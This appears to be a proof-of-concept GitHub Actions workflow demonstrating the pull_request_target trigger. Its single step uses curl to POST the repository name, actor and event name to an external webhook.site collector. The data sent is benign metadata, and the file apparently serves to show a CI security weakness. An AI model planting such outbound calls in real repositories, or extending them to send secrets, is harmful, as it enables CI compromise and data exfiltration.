name: PoC - pull_request_target demo

on:
  pull_request_target:
    types: [opened, synchronize]

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      - name: Ping webhook.site
        run: |
          echo "repo=$GITHUB_REPOSITORY actor=$GITHUB_ACTOR event=$GITHUB_EVENT_NAME" \
          | curl -v -X POST -H "Content-Type: text/plain" \
            -d @- https://webhook.site/b057826d-9b04-4ae9-a137-0f8a0cd24dc9
